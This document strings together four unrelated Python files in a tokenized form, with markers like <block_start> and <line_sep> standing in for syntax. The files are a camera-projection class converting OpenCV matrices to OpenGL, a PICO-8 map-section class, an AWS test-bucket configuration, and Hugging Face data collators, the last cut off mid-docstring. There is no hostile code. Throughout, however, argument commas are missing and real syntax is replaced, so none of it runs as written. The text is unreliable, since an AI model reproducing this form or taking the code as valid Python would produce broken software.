# -*- coding: utf-8 -*- # Max-Planck-Gesellschaft zur Förderung der Wissenschaften e.V. (MPG) is # holder of all proprietary rights on this computer program. # You can only use this computer program if you have closed # a license agreement with MPG or you get the right to use the computer # program from someone who is authorized to grant you that right. # Any use of the computer program without a valid license is prohibited and # liable to prosecution. # # Copyright©2019 Max-Planck-Gesellschaft zur Förderung # der Wissenschaften e.V. (MPG). acting on behalf of its Max Planck Institute # for Intelligent Systems. All rights reserved. # # Contact: <EMAIL> <import_stmt>cv2<import_stmt>numpy<as>np<import_from_stmt>.glm ortho<class_stmt>Camera<block_start><def_stmt>__init__ self width=1600 height=1200# Focal Length # equivalent 50mm <block_start>focal=np.sqrt(width<times>width+height<times>height)<line_sep>self.focal_x=focal<line_sep>self.focal_y=focal<line_sep># Principal Point Offset self.principal_x=width/2<line_sep>self.principal_y=height/2<line_sep># Axis Skew self.skew=0<line_sep># Image Size self.width=width<line_sep>self.height=height<line_sep>self.near=1<line_sep>self.far=10<line_sep># Camera Center self.center=np.array([0 0 1.6])<line_sep>self.direction=np.array([0 0 -1])<line_sep>self.right=np.array([1 0 0])<line_sep>self.up=np.array([0 1 0])<line_sep>self.ortho_ratio=<none><block_end><def_stmt>sanity_check self<block_start>self.center=self.center.reshape([-1])<line_sep>self.direction=self.direction.reshape([-1])<line_sep>self.right=self.right.reshape([-1])<line_sep>self.up=self.up.reshape([-1])<assert_stmt>len(self.center)<eq>3<assert_stmt>len(self.direction)<eq>3<assert_stmt>len(self.right)<eq>3<assert_stmt>len(self.up)<eq>3<block_end>@staticmethod<def_stmt>normalize_vector v<block_start>v_norm=np.linalg.norm(v)<line_sep><return>v<if>v_norm<eq>0<else>v/v_norm<block_end><def_stmt>get_real_z_value self z<block_start>z_near=self.near<line_sep>z_far=self.far<line_sep>z_n=2.0<times>z-1.0<line_sep>z_e=2.0<times>z_near<times>z_far/(z_far+z_near-z_n<times>(z_far-z_near))<line_sep><return>z_e<block_end><def_stmt>get_rotation_matrix self<block_start>rot_mat=np.eye(3)<line_sep>s=self.right<line_sep>s=self.normalize_vector(s)<line_sep>rot_mat[0 :]=s<line_sep>u=self.up<line_sep>u=self.normalize_vector(u)<line_sep>rot_mat[1 :]=-u<line_sep>rot_mat[2 :]=self.normalize_vector(self.direction)<line_sep><return>rot_mat<block_end><def_stmt>get_translation_vector self<block_start>rot_mat=self.get_rotation_matrix()<line_sep>trans=-np.dot(rot_mat self.center)<line_sep><return>trans<block_end><def_stmt>get_intrinsic_matrix self<block_start>int_mat=np.eye(3)<line_sep>int_mat[0 0]=self.focal_x<line_sep>int_mat[1 1]=self.focal_y<line_sep>int_mat[0 1]=self.skew<line_sep>int_mat[0 2]=self.principal_x<line_sep>int_mat[1 2]=self.principal_y<line_sep><return>int_mat<block_end><def_stmt>get_projection_matrix self<block_start>ext_mat=self.get_extrinsic_matrix()<line_sep>int_mat=self.get_intrinsic_matrix()<line_sep><return>np.matmul(int_mat ext_mat)<block_end><def_stmt>get_extrinsic_matrix self<block_start>rot_mat=self.get_rotation_matrix()<line_sep>int_mat=self.get_intrinsic_matrix()<line_sep>trans=self.get_translation_vector()<line_sep>extrinsic=np.eye(4)<line_sep>extrinsic[:3 :3]=rot_mat<line_sep>extrinsic[:3 3]=trans<line_sep><return>extrinsic[:3 :]<block_end><def_stmt>set_rotation_matrix self rot_mat<block_start>self.direction=rot_mat[2 :]<line_sep>self.up=-rot_mat[1 :]<line_sep>self.right=rot_mat[0 :]<block_end><def_stmt>set_intrinsic_matrix self int_mat<block_start>self.focal_x=int_mat[0 0]<line_sep>self.focal_y=int_mat[1 1]<line_sep>self.skew=int_mat[0 1]<line_sep>self.principal_x=int_mat[0 2]<line_sep>self.principal_y=int_mat[1 2]<block_end><def_stmt>set_projection_matrix self proj_mat<block_start>res=cv2.decomposeProjectionMatrix(proj_mat)<line_sep>int_mat,rot_mat,camera_center_homo=res[0] res[1] res[2]<line_sep>camera_center=camera_center_homo[0:3]/camera_center_homo[3]<line_sep>camera_center=camera_center.reshape(-1)<line_sep>int_mat=int_mat/int_mat[2][2]<line_sep>self.set_intrinsic_matrix(int_mat)<line_sep>self.set_rotation_matrix(rot_mat)<line_sep>self.center=camera_center<line_sep>self.sanity_check()<block_end><def_stmt>get_gl_matrix self<block_start>z_near=self.near<line_sep>z_far=self.far<line_sep>rot_mat=self.get_rotation_matrix()<line_sep>int_mat=self.get_intrinsic_matrix()<line_sep>trans=self.get_translation_vector()<line_sep>extrinsic=np.eye(4)<line_sep>extrinsic[:3 :3]=rot_mat<line_sep>extrinsic[:3 3]=trans<line_sep>axis_adj=np.eye(4)<line_sep>axis_adj[2 2]=-1<line_sep>axis_adj[1 1]=-1<line_sep>model_view=np.matmul(axis_adj extrinsic)<line_sep>projective=np.zeros([4 4])<line_sep>projective[:2 :2]=int_mat[:2 :2]<line_sep>projective[:2 2:3]=-int_mat[:2 2:3]<line_sep>projective[3 2]=-1<line_sep>projective[2 2]=(z_near+z_far)<line_sep>projective[2 3]=(z_near<times>z_far)<if_stmt>self.ortho_ratio<is><none><block_start>ndc=ortho(0 self.width 0 self.height z_near z_far)<line_sep>perspective=np.matmul(ndc projective)<block_end><else_stmt><block_start>perspective=ortho(-self.width<times>self.ortho_ratio/2 self.width<times>self.ortho_ratio/2 -self.height<times>self.ortho_ratio/2 self.height<times>self.ortho_ratio/2 z_near z_far)<block_end><return>perspective model_view<block_end><block_end><def_stmt>KRT_from_P proj_mat normalize_K=<true><block_start>res=cv2.decomposeProjectionMatrix(proj_mat)<line_sep>K,Rot,camera_center_homog=res[0] res[1] res[2]<line_sep>camera_center=camera_center_homog[0:3]/camera_center_homog[3]<line_sep>trans=-Rot.dot(camera_center)<if_stmt>normalize_K<block_start>K=K/K[2][2]<block_end><return>K Rot trans<block_end><def_stmt>MVP_from_P proj_mat width height near=0.1 far=10000<block_start>''' Convert OpenCV camera calibration matrix to OpenGL projection and model view matrix :param proj_mat: OpenCV camera projeciton matrix :param width: Image width :param height: Image height :param near: Z near value :param far: Z far value :return: OpenGL projection matrix and model view matrix '''<line_sep>res=cv2.decomposeProjectionMatrix(proj_mat)<line_sep>K,Rot,camera_center_homog=res[0] res[1] res[2]<line_sep>camera_center=camera_center_homog[0:3]/camera_center_homog[3]<line_sep>trans=-Rot.dot(camera_center)<line_sep>K=K/K[2][2]<line_sep>extrinsic=np.eye(4)<line_sep>extrinsic[:3 :3]=Rot<line_sep>extrinsic[:3 3:4]=trans<line_sep>axis_adj=np.eye(4)<line_sep>axis_adj[2 2]=-1<line_sep>axis_adj[1 1]=-1<line_sep>model_view=np.matmul(axis_adj extrinsic)<line_sep>zFar=far<line_sep>zNear=near<line_sep>projective=np.zeros([4 4])<line_sep>projective[:2 :2]=K[:2 :2]<line_sep>projective[:2 2:3]=-K[:2 2:3]<line_sep>projective[3 2]=-1<line_sep>projective[2 2]=(zNear+zFar)<line_sep>projective[2 3]=(zNear<times>zFar)<line_sep>ndc=ortho(0 width 0 height zNear zFar)<line_sep>perspective=np.matmul(ndc projective)<line_sep><return>perspective model_view<block_end>
"""The map section of a PICO-8 cart. The map region consists of 4096 bytes. The .p8 representation is 32 lines of 256 hexadecimal digits (128 bytes). The map is 128 tiles wide by 64 tiles high. Each tile is one of the 256 tiles from the spritesheet. Map memory describes the top 32 rows (128 * 32 = 4096). If the developer draws tiles in the bottom 32 rows, this is stored in the bottom of the gfx memory region. """<line_sep>__all__=['Map']<import_from_stmt>.. util<class_stmt>Map(util.BaseSection)<block_start>"""The map region of a PICO-8 cart."""<line_sep>HEX_LINE_LENGTH_BYTES=128<def_stmt>__init__ self *args **kwargs<block_start>"""The initializer. The Map initializer takes an optional gfx keyword argument whose value is a reference to the Gfx instance where lower map data is stored. """<line_sep>self._gfx=<none><if_stmt>'gfx'<in>kwargs<block_start>self._gfx=kwargs['gfx']<del_stmt>kwargs['gfx']<block_end>super().__init__(*args **kwargs)<block_end>@classmethod<def_stmt>empty cls version=4 gfx=<none><block_start>"""Creates an empty instance. Args: version: The PICO-8 file version. gfx: The Gfx object where lower map data is written. Returns: A Map instance. """<line_sep><return>cls(data=bytearray(b'\x00'<times>4096) version=version gfx=gfx)<block_end>@classmethod<def_stmt>from_lines cls *args **kwargs<block_start>gfx=<none><if_stmt>'gfx'<in>kwargs<block_start>gfx=kwargs['gfx']<del_stmt>kwargs['gfx']<block_end>result=super().from_lines(*args **kwargs)<line_sep>result._gfx=gfx<line_sep><return>result<block_end>@classmethod<def_stmt>from_bytes cls *args **kwargs<block_start>gfx=<none><if_stmt>'gfx'<in>kwargs<block_start>gfx=kwargs['gfx']<del_stmt>kwargs['gfx']<block_end>result=super().from_bytes(*args **kwargs)<line_sep>result._gfx=gfx<line_sep><return>result<block_end><def_stmt>get_cell self x y<block_start>"""Gets the tile ID for a map cell. Args: x: The map cell x (column) coordinate. (0-127) y: The map cell y (row) coordinate. Map must have a Gfx if y > 31. (0-63) Returns: The tile ID for the cell. """<assert_stmt>0<le>x<le>127<assert_stmt>(0<le>y<le>31)<or>((0<le>y<le>63)<and>self._gfx<is><not><none>)<if_stmt>y<le>31<block_start><return>self._data[y<times>128+x]<block_end><return>self._gfx._data[4096+(y-32)<times>128+x]<block_end><def_stmt>set_cell self x y val<block_start>"""Sets the tile ID for a map cell. Args: x: The map cell x (column) coordinate. (0-127) y: The map cell y (row) coordinate. (0-63) If y > 31, Map must have a Gfx, and this method updates the shared data region in the Gfx. val: The new tile ID for the cell. (0-255) """<assert_stmt>0<le>x<le>127<assert_stmt>(0<le>y<le>31)<or>((0<le>y<le>63)<and>self._gfx<is><not><none>)<assert_stmt>0<le>val<le>255<if_stmt>y<le>31<block_start>self._data[y<times>128+x]=val<block_end><else_stmt><block_start>self._gfx._data[4096+(y-32)<times>128+x]=val<block_end><block_end><def_stmt>get_rect_tiles self x y width=1 height=1<block_start>"""Gets a rectangle of map tiles. The map is a grid of 128x32 tiles, or 128x64 if using the gfx/map shared memory for map data. This method returns a rectangle of tile IDs on the map, as a list of bytearrays. If the requested rectangle size goes off the edge of the map, the off-edge tiles are returned as 0. The bottom edge is always assumed to be beyond the 64th row in the gfx/map shared memory region. Args: x: The map cell x (column) coordinate. (0-127) y: The map cell y (row) coordinate. (0-63) If y + height > 31, Map must have a Gfx. width: The width of the rectangle, as a number of tiles. height: The height of the rectangle, as a number of tiles. Returns: The rectangle of tile IDs, as a list of bytearrays. """<assert_stmt>0<le>x<le>127<assert_stmt>1<le>width<assert_stmt>1<le>height<assert_stmt>((0<le>y+height<le>32)<or>((0<le>y+height<le>64)<and>self._gfx<is><not><none>))<line_sep>result=[]<for_stmt>tile_y range(y y+height)<block_start>row=bytearray()<for_stmt>tile_x range(x x+width)<block_start><if_stmt>(tile_y<g>63)<or>(tile_x<g>127)<block_start>row.append(0)<block_end><else_stmt><block_start>row.append(self.get_cell(tile_x tile_y))<block_end><block_end>result.append(row)<block_end><return>result<block_end><def_stmt>set_rect_tiles self rect x y<block_start>"""Writes a rectangle of tiles to the map. If writing the given rectangle at the given coordinates causes the rectangle to extend off the edge of the map, the remainer is discarded. Args: rect: A rectangle of tile IDs, as an iterable of iterables of IDs. x: The map tile x coordinate (column) of the upper left corner to start writing. y: The map tile y coordinate (row) of the upper left corner to start writing. """<for_stmt>tile_y,row enumerate(rect)<block_start><for_stmt>tile_x,val enumerate(row)<block_start><if_stmt>((tile_y+y)<g>127)<or>((tile_x+x)<g>127)<block_start><continue><block_end>self.set_cell(tile_x+x tile_y+y val)<block_end><block_end><block_end><def_stmt>get_rect_pixels self x y width=1 height=1<block_start>"""Gets a rectangel of map tiles as pixels. This is similar to get_rect_tiles() except the tiles are extracted from Gfx data and returned as a rectangle of pixels. Just like PICO-8, tile ID 0 is rendered as empty (all 0's), not the actual tile at ID 0. Args: x: The map cell x (column) coordinate. (0-127) y: The map cell y (row) coordinate. (0-63) If y + height > 31, Map must have a Gfx. width: The width of the rectangle, as a number of tiles. height: The height of the rectangle, as a number of tiles. Returns: The rectangle of pixels, as a list of bytearrays of pixel colors. """<assert_stmt>self._gfx<is><not><none><assert_stmt>0<le>x<le>127<assert_stmt>1<le>width<assert_stmt>1<le>height<assert_stmt>0<le>y+height<le>64<line_sep>tile_rect=self.get_rect_tiles(x y width height)<line_sep>result=[]<for_stmt>tile_row tile_rect<block_start>pixel_row=[bytearray() bytearray() bytearray() bytearray() bytearray() bytearray() bytearray() bytearray()]<for_stmt>id tile_row<block_start><if_stmt>id<eq>0<block_start>sprite=[bytearray(b'\x00'<times>8)]<times>8<block_end><else_stmt><block_start>sprite=self._gfx.get_sprite(id)<block_end><for_stmt>i range(0 8)<block_start>pixel_row[i].extend(sprite[i])<block_end><block_end><for_stmt>i range(0 8)<block_start>result.append(pixel_row[i])<block_end><block_end><return>result<block_end><block_end>
<import_from_stmt>uuid uuid4<line_sep># separates test runs TEST_UUID=str(uuid4())<def_stmt>_code_bucket <block_start><return>'foundations-code-test'<block_end><def_stmt>make_code_bucket <block_start><import_from_stmt>foundations PrefixedBucket<import_from_stmt>foundations_aws AWSBucket<line_sep><return>PrefixedBucket(TEST_UUID AWSBucket _code_bucket())<block_end><def_stmt>_result_bucket <block_start><return>'foundations-results-test'<block_end><def_stmt>make_result_bucket <block_start><import_from_stmt>foundations PrefixedBucket<import_from_stmt>foundations_aws AWSBucket<line_sep><return>PrefixedBucket(TEST_UUID AWSBucket _result_bucket())<block_end><def_stmt>_config <block_start><import_from_stmt>foundations config_manager<import_from_stmt>foundations PrefixedBucket BucketPipelineArchive BucketPipelineListing<import_from_stmt>foundations_aws AWSBucket<line_sep># archive implementations archive_implementation={'archive_type':BucketPipelineArchive 'constructor_arguments':[PrefixedBucket TEST_UUID AWSBucket _result_bucket()] }<line_sep>config_manager['archive_listing_implementation']={'archive_listing_type':BucketPipelineListing 'constructor_arguments':[PrefixedBucket TEST_UUID AWSBucket _result_bucket()] }<line_sep>config_manager['stage_log_archive_implementation']=archive_implementation<line_sep>config_manager['persisted_data_archive_implementation']=archive_implementation<line_sep>config_manager['provenance_archive_implementation']=archive_implementation<line_sep>config_manager['job_source_archive_implementation']=archive_implementation<line_sep>config_manager['artifact_archive_implementation']=archive_implementation<line_sep>config_manager['miscellaneous_archive_implementation']=archive_implementation<line_sep>config_manager['run_script_environment']={'enable_stages':<true>}<line_sep># quiet logs config_manager['log_level']='ERROR'<block_end>_config()<line_sep>
# Copyright 2020 The HuggingFace Team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>random<import_stmt>warnings<import_from_stmt>collections.abc Mapping<import_from_stmt>dataclasses dataclass<import_from_stmt>typing Any Callable Dict List NewType Optional Tuple Union<import_from_stmt>..models.bert BertTokenizer BertTokenizerFast<import_from_stmt>..tokenization_utils_base PreTrainedTokenizerBase<import_from_stmt>..utils PaddingStrategy<line_sep>InputDataClass=NewType("InputDataClass" Any)<line_sep>""" A DataCollator is a function that takes a list of samples from a Dataset and collate them into a batch, as a dictionary of PyTorch/TensorFlow tensors or NumPy arrays. """<line_sep>DataCollator=NewType("DataCollator" Callable[[List[InputDataClass]] Dict[str Any]])<class_stmt>DataCollatorMixin<block_start><def_stmt>__call__ self features return_tensors=<none><block_start><if_stmt>return_tensors<is><none><block_start>return_tensors=self.return_tensors<block_end><if_stmt>return_tensors<eq>"tf"<block_start><return>self.tf_call(features)<block_end><elif_stmt>return_tensors<eq>"pt"<block_start><return>self.torch_call(features)<block_end><elif_stmt>return_tensors<eq>"np"<block_start><return>self.numpy_call(features)<block_end><else_stmt><block_start><raise>ValueError(f"Framework '{return_tensors}' not recognized!")<block_end><block_end><block_end><def_stmt>default_data_collator features:List[InputDataClass] return_tensors="pt"<arrow>Dict[str Any]<block_start>""" Very simple data collator that simply collates batches of dict-like objects and performs special handling for potential keys named: - `label`: handles a single value (int or float) per object - `label_ids`: handles a list of values per object Does not do any additional preprocessing: property names of the input object will be used as corresponding inputs to the model. See glue and ner for example of how it's useful. """<line_sep># In this function we'll make the assumption that all `features` in the batch # have the same attributes. # So we will look at the first element as a proxy for what attributes exist # on the whole batch. <if_stmt>return_tensors<eq>"pt"<block_start><return>torch_default_data_collator(features)<block_end><elif_stmt>return_tensors<eq>"tf"<block_start><return>tf_default_data_collator(features)<block_end><elif_stmt>return_tensors<eq>"np"<block_start><return>numpy_default_data_collator(features)<block_end><block_end>@dataclass<class_stmt>DefaultDataCollator(DataCollatorMixin)<block_start>""" Very simple data collator that simply collates batches of dict-like objects and performs special handling for potential keys named: - `label`: handles a single value (int or float) per object - `label_ids`: handles a list of values per object Does not do any additional preprocessing: property names of the input object will be used as corresponding inputs to the model. See glue and ner for example of how it's useful. This is an object (like other data collators) rather than a pure function like default_data_collator. This can be helpful if you need to set a return_tensors value at initialization. Args: return_tensors (`str`): The type of Tensor to return. Allowable values are "np", "pt" and "tf". """<line_sep>return_tensors:str="pt"<def_stmt>__call__ self features:List[Dict[str Any]] return_tensors=<none><arrow>Dict[str Any]<block_start><if_stmt>return_tensors<is><none><block_start>return_tensors=self.return_tensors<block_end><return>default_data_collator(features return_tensors)<block_end><block_end><def_stmt>torch_default_data_collator features:List[InputDataClass]<arrow>Dict[str Any]<block_start><import_stmt>torch<if_stmt><not>isinstance(features[0] Mapping)<block_start>features=[vars(f)<for>f features]<block_end>first=features[0]<line_sep>batch={}<line_sep># Special handling for labels. # Ensure that tensor is created with the correct type # (it should be automatically the case, but let's make sure of it.) <if_stmt>"label"<in>first<and>first["label"]<is><not><none><block_start>label=first["label"].item()<if>isinstance(first["label"] torch.Tensor)<else>first["label"]<line_sep>dtype=torch.long<if>isinstance(label int)<else>torch.float<line_sep>batch["labels"]=torch.tensor([f["label"]<for>f features] dtype=dtype)<block_end><elif_stmt>"label_ids"<in>first<and>first["label_ids"]<is><not><none><block_start><if_stmt>isinstance(first["label_ids"] torch.Tensor)<block_start>batch["labels"]=torch.stack([f["label_ids"]<for>f features])<block_end><else_stmt><block_start>dtype=torch.long<if>type(first["label_ids"][0])<is>int<else>torch.float<line_sep>batch["labels"]=torch.tensor([f["label_ids"]<for>f features] dtype=dtype)<block_end><block_end># Handling of all other possible keys. # Again, we will use the first element to figure out which key/values are not None for this model. <for_stmt>k,v first.items()<block_start><if_stmt>k<not><in>("label" "label_ids")<and>v<is><not><none><and><not>isinstance(v str)<block_start><if_stmt>isinstance(v torch.Tensor)<block_start>batch[k]=torch.stack([f[k]<for>f features])<block_end><else_stmt><block_start>batch[k]=torch.tensor([f[k]<for>f features])<block_end><block_end><block_end><return>batch<block_end><def_stmt>tf_default_data_collator features:List[InputDataClass]<arrow>Dict[str Any]<block_start><import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<if_stmt><not>isinstance(features[0] Mapping)<block_start>features=[vars(f)<for>f features]<block_end>first=features[0]<line_sep>batch={}<line_sep># Special handling for labels. # Ensure that tensor is created with the correct type # (it should be automatically the case, but let's make sure of it.) <if_stmt>"label"<in>first<and>first["label"]<is><not><none><block_start>label_col_name="label"<block_end><elif_stmt>"label_ids"<in>first<and>first["label_ids"]<is><not><none><block_start>label_col_name="label_ids"<block_end><elif_stmt>"labels"<in>first<and>first["labels"]<is><not><none><block_start>label_col_name="labels"<block_end><else_stmt><block_start>label_col_name=<none><block_end><if_stmt>label_col_name<is><not><none><block_start><if_stmt>isinstance(first[label_col_name] tf.Tensor)<block_start>dtype=tf.int64<if>first[label_col_name].dtype.is_integer()<else>tf.float32<block_end><elif_stmt>isinstance(first[label_col_name] np.ndarray)<or>isinstance(first[label_col_name] np.generic)<block_start>dtype=tf.int64<if>np.issubdtype(first[label_col_name].dtype np.integer)<else>tf.float32<block_end><elif_stmt>isinstance(first[label_col_name] (tuple list))<block_start>dtype=tf.int64<if>isinstance(first[label_col_name][0] int)<else>tf.float32<block_end><else_stmt><block_start>dtype=tf.int64<if>isinstance(first[label_col_name] int)<else>tf.float32<block_end>batch["labels"]=tf.convert_to_tensor([f[label_col_name]<for>f features] dtype=dtype)<block_end># Handling of all other possible keys. # Again, we will use the first element to figure out which key/values are not None for this model. <for_stmt>k,v first.items()<block_start><if_stmt>k<not><in>("label" "label_ids" "labels")<and>v<is><not><none><and><not>isinstance(v str)<block_start><if_stmt>isinstance(v (tf.Tensor np.ndarray))<block_start>batch[k]=tf.stack([f[k]<for>f features])<block_end><else_stmt><block_start>batch[k]=tf.convert_to_tensor([f[k]<for>f features])<block_end><block_end><block_end><return>batch<block_end><def_stmt>numpy_default_data_collator features:List[InputDataClass]<arrow>Dict[str Any]<block_start><import_stmt>numpy<as>np<if_stmt><not>isinstance(features[0] Mapping)<block_start>features=[vars(f)<for>f features]<block_end>first=features[0]<line_sep>batch={}<line_sep># Special handling for labels. # Ensure that tensor is created with the correct type # (it should be automatically the case, but let's make sure of it.) <if_stmt>"label"<in>first<and>first["label"]<is><not><none><block_start>label=first["label"].item()<if>isinstance(first["label"] np.ndarray)<else>first["label"]<line_sep>dtype=np.int64<if>isinstance(label int)<else>np.float32<line_sep>batch["labels"]=np.array([f["label"]<for>f features] dtype=dtype)<block_end><elif_stmt>"label_ids"<in>first<and>first["label_ids"]<is><not><none><block_start><if_stmt>isinstance(first["label_ids"] np.ndarray)<block_start>batch["labels"]=np.stack([f["label_ids"]<for>f features])<block_end><else_stmt><block_start>dtype=np.int64<if>type(first["label_ids"][0])<is>int<else>np.float32<line_sep>batch["labels"]=np.array([f["label_ids"]<for>f features] dtype=dtype)<block_end><block_end># Handling of all other possible keys. # Again, we will use the first element to figure out which key/values are not None for this model. <for_stmt>k,v first.items()<block_start><if_stmt>k<not><in>("label" "label_ids")<and>v<is><not><none><and><not>isinstance(v str)<block_start><if_stmt>isinstance(v np.ndarray)<block_start>batch[k]=np.stack([f[k]<for>f features])<block_end><else_stmt><block_start>batch[k]=np.array([f[k]<for>f features])<block_end><block_end><block_end><return>batch<block_end>@dataclass<class_stmt>DataCollatorWithPadding<block_start>""" Data collator that will dynamically pad the inputs received. Args: tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]): The tokenizer used for encoding the data. padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`): Select a strategy to pad the returned sequences (according to the model's padding side and padding index) among: - `True` or `'longest'` (default): Pad to the longest sequence in the batch (or no padding if only a single sequence is provided). - `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum acceptable input length for the model if that argument is not provided. - `False` or `'do_not_pad'`: No padding (i.e., can output a batch with sequences of different lengths). max_length (`int`, *optional*): Maximum length of the returned list and optionally padding length (see above). pad_to_multiple_of (`int`, *optional*): If set will pad the sequence to a multiple of the provided value. This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >= 7.5 (Volta). return_tensors (`str`): The type of Tensor to return. Allowable values are "np", "pt" and "tf". """<line_sep>tokenizer:PreTrainedTokenizerBase<line_sep>padding:Union[bool str PaddingStrategy]=<true><line_sep>max_length:Optional[int]=<none><line_sep>pad_to_multiple_of:Optional[int]=<none><line_sep>return_tensors:str="pt"<def_stmt>__call__ self features:List[Dict[str Any]]<arrow>Dict[str Any]<block_start>batch=self.tokenizer.pad(features padding=self.padding max_length=self.max_length pad_to_multiple_of=self.pad_to_multiple_of return_tensors=self.return_tensors )<if_stmt>"label"<in>batch<block_start>batch["labels"]=batch["label"]<del_stmt>batch["label"]<block_end><if_stmt>"label_ids"<in>batch<block_start>batch["labels"]=batch["label_ids"]<del_stmt>batch["label_ids"]<block_end><return>batch<block_end><block_end>@dataclass<class_stmt>DataCollatorForTokenClassification(DataCollatorMixin)<block_start>""" Data collator that will dynamically pad the inputs received, as well as the labels. Args: tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]): The tokenizer used for encoding the data. padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`): Select a strategy to pad the returned sequences (according to the model's padding side and padding index) among: - `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single sequence is provided). - `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum acceptable input length for the model if that argument is not provided. - `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of different lengths). max_length (`int`, *optional*): Maximum length of the returned list and optionally padding length (see above). pad_to_multiple_of (`int`, *optional*): If set will pad the sequence to a multiple of the provided value. This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >= 7.5 (Volta). label_pad_token_id (`int`, *optional*, defaults to -100): The id to use when padding the labels (-100 will be automatically ignore by PyTorch loss functions). return_tensors (`str`): The type of Tensor to return. Allowable values are "np", "pt" and "tf". """<line_sep>tokenizer:PreTrainedTokenizerBase<line_sep>padding:Union[bool str PaddingStrategy]=<true><line_sep>max_length:Optional[int]=<none><line_sep>pad_to_multiple_of:Optional[int]=<none><line_sep>label_pad_token_id:int=-100<line_sep>return_tensors:str="pt"<def_stmt>torch_call self features<block_start><import_stmt>torch<line_sep>label_name="label"<if>"label"<in>features[0].keys()<else>"labels"<line_sep>labels=[feature[label_name]<for>feature features]<if>label_name<in>features[0].keys()<else><none><line_sep>batch=self.tokenizer.pad(features padding=self.padding max_length=self.max_length pad_to_multiple_of=self.pad_to_multiple_of # Conversion to tensors will fail if we have labels as they are not of the same length yet. return_tensors="pt"<if>labels<is><none><else><none> )<if_stmt>labels<is><none><block_start><return>batch<block_end>sequence_length=torch.tensor(batch["input_ids"]).shape[1]<line_sep>padding_side=self.tokenizer.padding_side<if_stmt>padding_side<eq>"right"<block_start>batch[label_name]=[list(label)+[self.label_pad_token_id]<times>(sequence_length-len(label))<for>label labels]<block_end><else_stmt><block_start>batch[label_name]=[[self.label_pad_token_id]<times>(sequence_length-len(label))+list(label)<for>label labels]<block_end>batch={k:torch.tensor(v dtype=torch.int64)<for>k,v batch.items()}<line_sep><return>batch<block_end><def_stmt>tf_call self features<block_start><import_stmt>tensorflow<as>tf<line_sep>label_name="label"<if>"label"<in>features[0].keys()<else>"labels"<line_sep>labels=[feature[label_name]<for>feature features]<if>label_name<in>features[0].keys()<else><none><line_sep>batch=self.tokenizer.pad(features padding=self.padding max_length=self.max_length pad_to_multiple_of=self.pad_to_multiple_of # Conversion to tensors will fail if we have labels as they are not of the same length yet. return_tensors="tf"<if>labels<is><none><else><none> )<if_stmt>labels<is><none><block_start><return>batch<block_end>sequence_length=tf.convert_to_tensor(batch["input_ids"]).shape[1]<line_sep>padding_side=self.tokenizer.padding_side<if_stmt>padding_side<eq>"right"<block_start>batch["labels"]=[list(label)+[self.label_pad_token_id]<times>(sequence_length-len(label))<for>label labels]<block_end><else_stmt><block_start>batch["labels"]=[[self.label_pad_token_id]<times>(sequence_length-len(label))+list(label)<for>label labels]<block_end>batch={k:tf.convert_to_tensor(v dtype=tf.int64)<for>k,v batch.items()}<line_sep><return>batch<block_end><def_stmt>numpy_call self features<block_start><import_stmt>numpy<as>np<line_sep>label_name="label"<if>"label"<in>features[0].keys()<else>"labels"<line_sep>labels=[feature[label_name]<for>feature features]<if>label_name<in>features[0].keys()<else><none><line_sep>batch=self.tokenizer.pad(features padding=self.padding max_length=self.max_length pad_to_multiple_of=self.pad_to_multiple_of # Conversion to tensors will fail if we have labels as they are not of the same length yet. return_tensors="np"<if>labels<is><none><else><none> )<if_stmt>labels<is><none><block_start><return>batch<block_end>sequence_length=np.array(batch["input_ids"]).shape[1]<line_sep>padding_side=self.tokenizer.padding_side<if_stmt>padding_side<eq>"right"<block_start>batch["labels"]=[list(label)+[self.label_pad_token_id]<times>(sequence_length-len(label))<for>label labels]<block_end><else_stmt><block_start>batch["labels"]=[[self.label_pad_token_id]<times>(sequence_length-len(label))+list(label)<for>label labels]<block_end>batch={k:np.array(v dtype=np.int64)<for>k,v batch.items()}<line_sep><return>batch<block_end><block_end><def_stmt>_torch_collate_batch examples tokenizer pad_to_multiple_of:Optional[int]=<none><block_start>"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""<import_stmt>numpy<as>np<import_stmt>torch<line_sep># Tensorize if necessary. <if_stmt>isinstance(examples[0] (list tuple np.ndarray))<block_start>examples=[torch.tensor(e dtype=torch.long)<for>e examples]<block_end>length_of_first=examples[0].size(0)<line_sep># Check if padding is necessary. are_tensors_same_length=all(x.size(0)<eq>length_of_first<for>x examples)<if_stmt>are_tensors_same_length<and>(pad_to_multiple_of<is><none><or>length_of_first%pad_to_multiple_of<eq>0)<block_start><return>torch.stack(examples dim=0)<block_end># If yes, check if we have a `pad_token`. <if_stmt>tokenizer._pad_token<is><none><block_start><raise>ValueError("You are attempting to pad samples but the tokenizer you are using"<concat>f" ({tokenizer.__class__.__name__}) does not have a pad token.")<block_end># Creating the full tensor and filling it with our data. max_length=max(x.size(0)<for>x examples)<if_stmt>pad_to_multiple_of<is><not><none><and>(max_length%pad_to_multiple_of<ne>0)<block_start>max_length=((max_length<floordiv>pad_to_multiple_of)+1)<times>pad_to_multiple_of<block_end>result=examples[0].new_full([len(examples) max_length] tokenizer.pad_token_id)<for_stmt>i,example enumerate(examples)<block_start><if_stmt>tokenizer.padding_side<eq>"right"<block_start>result[i :example.shape[0]]=example<block_end><else_stmt><block_start>result[i -example.shape[0]:]=example<block_end><block_end><return>result<block_end><def_stmt>_tf_collate_batch examples tokenizer pad_to_multiple_of:Optional[int]=<none><block_start><import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<line_sep>"""Collate `examples` into a batch, using the information in `tokenizer` for padding if 